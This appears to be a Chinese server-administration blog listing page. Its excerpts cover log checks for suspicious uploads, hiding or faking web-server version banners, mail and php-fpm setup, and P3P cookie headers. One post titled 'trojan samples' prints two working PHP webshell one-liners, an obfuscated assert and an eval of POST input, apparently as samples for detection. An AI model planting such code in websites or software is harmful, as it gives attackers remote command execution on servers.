0x01 查看访问日志

看是否有文件上传操作(POST方法),

IPREMOVED - - [01/Mar/2013:06:16:48 -0600] "POST/uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
IPREMOVED - - [01/Mar/2013:06:12:58 -0600] "POST/public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"

nginx默认记录的日志格式为:  
Tags: ,
1.隐藏php版本号
隐藏方法:vim php.ini添加如下代码

expose_php = Off  

2.隐藏nginx版本号
隐藏方法:vim nginx.conf 在http里加入

server_tokens off;  

3.隐藏apache版本号
隐藏方法:vim httpd.ini 添加如下代码

ServerTokens = ProductOnly  
ServerSignature = Off  

修改每个配置文件都要重启服务才可以生效。
伪装apache
编辑ap_release.h文件,修改

“#define AP_SERVER_BASEPRODUCT \"Apache\"”



“#define AP_SERVER_BASEPRODUCT \"Microsoft-IIS/5.0\"”

编辑os/unix/os.h文件,修改

“#define PLATFORM \"Unix\"”为“#define PLATFORM \"Win32\"”

修改完毕后,重新编译、安装Apache。
伪装nginx

cd /usr/local/src/nginx-1.0.6/src/core/
[root@server core]# cat nginx.h

/*  
* Copyright (C) Igor Sysoev  
*/

#ifndef _NGINX_H_INCLUDED_  
#define _NGINX_H_INCLUDED_  

#define NGINX_VERSION      "1.0"  
#define NGINX_VER          "ZWS/" NGINX_VERSION  

#define NGINX_VAR          "ZWS"  
#define NGX_OLDPID_EXT     ".oldbin"  

#endif /* _NGINX_H_INCLUDED_ */  

1. Sendmail配置
配置发送邮件的邮箱认证信息


vi /etc/mail.rc


--- 增加如下内容 ---


set from=yourname@your-domain.com
set smtp=mail.your-domain.com
set smtp-auth-user=yourname
set smtp-auth-password=yourpasswd
set smtp-auth=login

2. 测试发送邮件功能

echo  "hello word" | mail -s "mail title" yourname@your-domain.com
Tags: ,
       php 5.3.3 源码中已经内嵌了 php-fpm,不用象以前的php版本一样专门打补丁了,只需要在configure的时候添加编译参数即可。

       关于php-fpm的编译参数有 –enable-fpm –with-fpm-user=www –with-fpm-group=www –with-libevent-dir=libevent位置。

       但是,php 5.3.3 下的php-fpm 不再支持 php-fpm 以前具有的 /usr/local/php/sbin/php-fpm (start|stop|reload)等命令,需要使用信号控制:

       master 进程可以理解以下信号:

       INT, TERM:立刻终止
       QUIT :平滑终止
       USR1:重新打开日志文件
       USR2:平滑重载所有worker进程并重新载入配置和二进制模块

       示例:
       1)php-fpm 关闭:
       # kill -INT `cat /usr/local/php/var/run/php-fpm.pid`

       2)php-fpm 重启:
       # kill -USR2 `cat /usr/local/php/var/run/php-fpm.pid`

       查看php-fpm进程数:
       # ps aux | grep -c php-fpm

linux mutt详解 不指定

jed , 2014-10-20 15:22 , 服务器技术 , 评论(0) , 阅读(42145) , Via 本站原创
首先介绍一下mutt这个软件,它是一款基于文字界面的邮件客户端,非常小巧,但功能强大,可以用它来读写,回复保存和删除你的邮件,能在linux命令行模式下收发邮件附件。

  我只讲它很小的一部分功能,因为我也是刚刚开始摸索这个软件。更多的用法请查阅官网:http://www.mutt.org

一、mutt的安装
查看nginx编译参数:/usr/local/nginx/sbin/nginx -V

查看apache编译参数:cat /usr/local/apache/build/config.nice

查看mysql编译参数:cat /usr/local/mysql/bin/mysqlbug | grep CONFIGURE_LINE

查看php编译参数:/usr /local/php/bin/php -i | grep configure 或者 /usr/local/php/bin/php-config

木马样本 不指定

jed , 2014-7-1 16:07 , 服务器技术 , 评论(0) , 阅读(79689) , Via 本站原创

<?array_map("ass\x65rt",(array)$_REQUEST[dede]);?>



<?php $command=$_POST[1990]; @eval($command);?>

最近在做一个项目需要用到IFRAME,发现IE在对iframe里面的页面写Cookie的时候有一些安全限制,导致写入和读取Cookie不成功,找了好长时间的解决办法,重要找到如下的办法:




1.页面里的COOKIE不能是浏览器进程的COOKIE(包括验证票和不设置超时时间的COOKIE),否则跨域会取不到.这点做跨域COOKIE的人比较少提到.不过实际上留意下几家大学做的方案,有细微的提到他们的验证模块里的COOKIE是有设置超时时间的.

2.当利用IFRAME时,记得要在相应的动态页的页头添加一下P3P的信息,否则IE会自觉的把IFRAME框里的COOKIE给阻止掉,产生问题.本身不保存自然就取不到了.这个其实是FRAMESET和COOKIE的问题,用FRAME或者IFRAME都会遇到.

3.测试时输出TRACE,会减少很多测试的工作量.

只需要设置 P3P HTTP Header,在隐含 iframe 里面跨域设置 cookie 就可以成功。他们所用的内容是:

P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'

ASP直接在头部加了头部申明,测试有效。

<%Response.AddHeader "P3P", "CP=CAO PSA OUR"%>

php的话,应该是如下写法:

header('P3P: CP=CAO PSA OUR');

ASP.NET的话
通过在代码上加Response.AddHeader("P3P", "CP=CAO PSA OUR")或者在Window服务中将ASP.NET State Service 启动。

JSP:

response.setHeader("P3P","CP=CAO PSA OUR")
邮件服务器的DNS设置

DNS记录,需要你到你的域名托管商那里进行设置或者你自己管理DNS服务器。不少域名托管商不支持txt记录或者不支持DKIM记录,所以你就无法使用SPF和DKIM的功能。
DNS的修改,需要48小时以上才能生效。
国内的万网是不支持DKIM,目前新网是支持SPF和DKIM。
Ghostfiles数据备份软件下载
下载文件 (已下载 1035 次)
分页: 5/34 第一页 上页 1 2 3 4 5 6 7 8 9 10 下页 最后页 [ 显示模式: 摘要 | 列表 ]